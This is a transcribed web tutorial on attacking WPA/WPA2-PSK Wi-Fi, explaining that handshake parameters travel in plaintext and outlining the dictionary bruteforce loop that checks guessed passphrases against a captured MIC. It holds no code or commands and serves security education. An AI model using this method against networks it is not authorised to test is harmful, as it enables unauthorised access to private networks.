Wi-Fu - Attacking WPA-PSK - Part 2
description
Transcript of Wi-Fu - Attacking WPA-PSK - Part 2
-
5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2
1/3
You are here: Home // Wi-Fi // WPA Attacks // Attacking WPA-PSK - Part 2 AAA
Home Intelligence Gathering Wi-Fi Vulnerable by Design Misc Contact
Search...
MostRead in Wi-Fi
Attacking WPA-PSK
Without Wireless
Clients
WPA2-PSK Evil Twin
Attack
WPA2-PSK Rainbow
Table Attack
Wi-Fi Protected Setup
KoreK's ChopChop
Attack - Part 1
Attacking WPA-PSK - Part 2
Details
Category: WPA/2
Published on Saturday, 18 January 2014 19:30
Recap
The image below s hows a basic flow of the information required to derive the
PSK and PTK for a WPA network.
There is a lot of information that goes between the wireless client and access
point. But when you think about it, you will realise that all of these parameters,
bar one, is sent in plaintext. An attacker silently sniffing the network traffic will
learn of all these values, except the original passphrase entered by the user.
Bruteforce
Due to the high-computational tasks to be carried out, the process of
bruteforcing the passphrase is rather slow.
1. The attacker makes a guess at the passphrase (from a dictionary
or other wordlist source)
2. This passphrase is used with the SSID and put through the
PBKDF2 function, producing a PSK (which may or may not be
correct)
3. This PSK is used with the captured information from the 4-way
handshake and put through the PBKDF2 function again. This
produces a PTK.
4. The attacker uses this information to calculate a MIC - which is
then checked against the MIC in the captured packets.
5. If the MIC matches, the original passphrase was correct; if not the
entire process is repeated with the next passphrase.
http://wi-fu.co.uk/wi-fi/wpa-attacks/106-wpa2-psk-rainbow-table-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/109-attacking-wpa-psk-without-wireless-clientshttp://wi-fu.co.uk/wi-fi/wpa-attacks/95-attacking-wpa-psk-part-2http://wi-fu.co.uk/wi-fi/wep-attacks/87-korek-s-chopchop-attack-part-1http://wi-fu.co.uk/wi-fi/wpa-attacks/107-wi-fi-protected-setuphttp://wi-fu.co.uk/wi-fi/wpa-attacks/106-wpa2-psk-rainbow-table-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/108-wpa2-psk-evil-twin-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/109-attacking-wpa-psk-without-wireless-clientshttp://wi-fu.co.uk/contacthttp://wi-fu.co.uk/mischttp://wi-fu.co.uk/vulnerable-by-designhttp://wi-fu.co.uk/wifihttp://wi-fu.co.uk/intelligence-gatheringhttp://wi-fu.co.uk/http://wi-fu.co.uk/wi-fi/wpa-attackshttp://wi-fu.co.uk/wifihttp://wi-fu.co.uk/ -
5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2
2/3
Copyright 2014 - Material is f or educational purposes only
JC omments
< Prev Next >
A Word on WPA2-PSK
Even though WPA2 us es different encryption schemes and functions;
because what we are really attacking is a weak pass phrase, the attack
process for WPA2 is identical to WPA.
Add comment
http://wi-fu.co.uk/wi-fi/wpa-attacks/96-wpa2-psk-dictionary-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/94-attacking-wpa-psk-part-1http://www.joomlatune.com/ -
5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2
3/3